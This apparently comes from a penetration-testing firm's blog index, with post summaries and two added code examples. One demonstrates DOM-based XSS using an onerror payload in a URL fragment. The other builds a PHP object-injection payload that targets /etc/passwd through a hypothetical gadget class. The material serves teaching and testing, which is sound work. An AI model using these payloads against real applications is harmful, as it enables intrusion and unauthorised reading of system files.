Security Blog

Feature development & monitoring tips

Author: Josh Hickling

Josh is one of Pentest People's Web Application testers. He comes from a university background and is heavily interested in the ethical hacking world.

May 16, 2022

Two Minutes of Ransomware Attacks: The Facts

In this blog post, we discuss what ransomware is, how it is used and the risks associated with it. We also provide tips on how to protect yourself from ransomware attacks. If you prefer to watch, Liam explains ransomware in a two-minute video. What is […]

February 18, 2022

Apple Cyber Attacks: Mobile Devices Still at Risk

Apple iPhone users are among the most heavily targeted groups when it comes to cyber attacks. Last November Apple uncovered what it described as its biggest hack in history, one that had gone undetected for five years, and at the time alerted the users who had fallen victim to it. The phishing campaign targeted Apple's iCloud service […]

February 14, 2022

Valentines Scams

This Valentine’s Day, be aware of the different scams that may be targeting you. We’ll cover how to avoid fraud, catfishing and other techniques used by scammers this Valentine’s Day.

February 7, 2022

European Oil Hacks

Today we launch Pentest People News Bites, starting with the recent European oil hack and some cyber security advice from one of our senior consultants.

January 19, 2022

Under the Sheets, Practical Android Static Analysis

This blog discusses Android client-side controls. Client-side controls are a point of controversy within the mobile security industry: in almost all cases they provide only a layer of obscurity between an attacker and potentially sensitive functionality. The aim of this piece is to demonstrate how such controls may be bypassed during a penetration test and why they are inherently vulnerable to interference from an attacker who controls the device and the app binary.

January 22, 2021

Depop Industrial Level Hacking

After the recent news regarding the Depop account hacks, Josh Hickling, our resident web application tester, explains how this happened and how you, the user, can protect yourself.

June 17, 2020

So, what is DOM XSS?

Cross-Site Scripting (XSS) is one of the most thoroughly covered web application issues around; however, it is surprising how poorly DOM-based vectors are understood. This blog aims to clear that confusion up by discussing the difference between traditional (reflected and stored) XSS, where the payload passes through the server, and DOM-based XSS, where the payload flows from a client-side source into a client-side sink without the server ever seeing it.
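As an added illustration that is not code from the original post, the following Node-runnable model contrasts the two flavours. The greeting widget, the example.test hostname and the payload are constructed for the example; the DOM element is a plain object standing in for a real element so the source (`location.hash`) and sink (`innerHTML`) are explicit.

```javascript
// Added example (not from the original post): reflected versus DOM-based XSS
// modelled without a browser so it runs under Node.

// Source: the URL the victim opens. Everything after '#' is the fragment.
// The browser never sends the fragment to the server, so server-side
// logging, a WAF and server-side output encoding never see it. That is the
// defining property of a DOM-based vector. Payload constructed for the demo.
const VICTIM_URL =
  "https://example.test/welcome#name=<img src=x onerror=alert(1)>";

// What the server actually receives for a URL: path + query only.
// For VICTIM_URL this is just "/welcome", with no trace of the payload.
function serverVisiblePart(urlString) {
  const u = new URL(urlString);
  return u.pathname + u.search;
}

// Reads the fragment the way a typical widget does: location.hash.slice(1)
// parsed as key=value pairs. URLSearchParams undoes the percent-encoding
// that the URL parser applied to '<', '>' and spaces.
function nameFromFragment(urlString) {
  const u = new URL(urlString);
  return new URLSearchParams(u.hash.slice(1)).get("name") ?? "";
}

// Minimal stand-in for a DOM element so the sink is visible in the code.
function makeElement() {
  return { innerHTML: "", textContent: "" };
}

// Vulnerable widget: source (location.hash) flows into sink (innerHTML)
// with no encoding, so the attacker's markup is parsed as HTML and the
// onerror handler runs. Nothing here ever touched the server.
function renderGreetingVulnerable(urlString) {
  const el = makeElement();
  el.innerHTML = "Welcome, " + nameFromFragment(urlString) + "!";
  return el;
}

// Fixed widget: same untrusted source, but the sink is textContent, which
// never parses markup. HTML-encoding before innerHTML would also work, but
// choosing a non-HTML sink removes the problem instead of managing it.
function renderGreetingFixed(urlString) {
  const el = makeElement();
  el.textContent = "Welcome, " + nameFromFragment(urlString) + "!";
  return el;
}

// Crude approximation of what the HTML parser would do with an innerHTML
// assignment: is there a tag carrying an on* event handler attribute?
function containsEventHandler(html) {
  return /<[^>]+\son\w+\s*=/i.test(html);
}

// Stand-alone run: show what the server sees versus what the page renders.
console.log("server sees:", serverVisiblePart(VICTIM_URL));
console.log("vulnerable innerHTML:", renderGreetingVulnerable(VICTIM_URL).innerHTML);
console.log("fixed innerHTML:", JSON.stringify(renderGreetingFixed(VICTIM_URL).innerHTML));
```

The practical consequence for testing is that a proxy history will show a clean request for `/welcome`; the vector is only found by reading the client-side script for source-to-sink flows.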

March 23, 2020

S3 and the Anti-Virus Scan

Amazon S3 is a great, cheap and flexible option for sharing and hosting files. What is not great is that any file can be uploaded to an S3 bucket, and "any file" includes malicious ones. It is very common for nobody to check the files that land in S3, but it is possible to virus-scan uploads to S3; it just takes a little work.

February 17, 2020

PHP Deserialisation/Object Injection

PHP deserialisation vulnerabilities are rarely seen on grey-box application assessments, but they should not be overlooked. This blog looks at PHP deserialisation (object injection), covering how these vulnerabilities can be spotted in traffic and the exploit payload required to read local files once the application passes attacker-controlled data to unserialize().
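As an added example that is not code from the original post, the block below shows the two halves a tester needs: a check that flags request parameters carrying PHP-serialised data (raw or base64-encoded), and a builder for the object-injection payload in PHP's serialize() wire format. The gadget class name `FileRead` and its `path` property are assumptions for the illustration; on a real target the class must already be loaded by the application and must do something useful with that property in `__wakeup()` or `__destruct()`.

```javascript
// Added example (not from the original post): spotting PHP-serialised input
// and building an object-injection payload. Gadget class is hypothetical.

// Serialise a JS value in PHP's serialize() format.
// Supported: null, booleans, integers, strings, arrays (PHP arrays with
// integer keys) and plain objects (PHP objects when className is given,
// otherwise PHP associative arrays).
function phpSerialize(value, className) {
  if (value === null) return "N;";
  if (typeof value === "boolean") return `b:${value ? 1 : 0};`;
  if (typeof value === "number" && Number.isInteger(value)) return `i:${value};`;
  if (typeof value === "string") {
    // PHP records the byte length, not the number of UTF-16 code units.
    return `s:${Buffer.byteLength(value, "utf8")}:"${value}";`;
  }
  if (Array.isArray(value)) {
    const body = value.map((v, i) => phpSerialize(i) + phpSerialize(v)).join("");
    return `a:${value.length}:{${body}}`;
  }
  if (typeof value === "object") {
    const keys = Object.keys(value);
    const body = keys.map((k) => phpSerialize(k) + phpSerialize(value[k])).join("");
    if (className) {
      return `O:${className.length}:"${className}":${keys.length}:{${body}}`;
    }
    return `a:${keys.length}:{${body}}`;
  }
  throw new TypeError("unsupported value type: " + typeof value);
}

// Type tags that open a serialised PHP value. Seeing one of these at the
// start of a cookie, hidden field or query parameter is the usual first
// sign that unserialize() is being called on user input.
const PHP_SERIALIZED = /^(?:N;|[bid]:[^;]+;|s:\d+:"|a:\d+:\{|O:\d+:")/;

// Classify a parameter value as raw serialised data, base64-wrapped
// serialised data, or something else.
function classifyParameter(value) {
  if (PHP_SERIALIZED.test(value)) return "php-serialized";
  if (value.length % 4 === 0 && /^[A-Za-z0-9+/]+={0,2}$/.test(value)) {
    const decoded = Buffer.from(value, "base64").toString("utf8");
    if (PHP_SERIALIZED.test(decoded)) return "php-serialized-base64";
  }
  return "other";
}

// Payload for the assumed gadget: a loaded class whose magic method reads
// whatever $this->path names. Pointing it at /etc/passwd turns the
// unserialize() call into a local file read.
function buildFileReadPayload(path) {
  return phpSerialize({ path }, "FileRead");
}

// Stand-alone run: constructed sample values as they might appear in a
// proxy history, followed by the payload.
const SAMPLE_PARAMS = {
  session: "a:1:{s:4:\"user\";s:5:\"guest\";}",
  prefs: Buffer.from("O:4:\"User\":1:{s:4:\"name\";s:3:\"bob\";}").toString("base64"),
  page: "1",
};
for (const [name, value] of Object.entries(SAMPLE_PARAMS)) {
  console.log(name, "->", classifyParameter(value));
}
console.log(buildFileReadPayload("/etc/passwd"));
```

Remember that the property name and the class must match what the target's code actually declares, and that the property count and string lengths in the payload must be exact: PHP's unserialize() rejects a value whose declared lengths do not match, which is also why hand-editing a captured blob usually fails.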
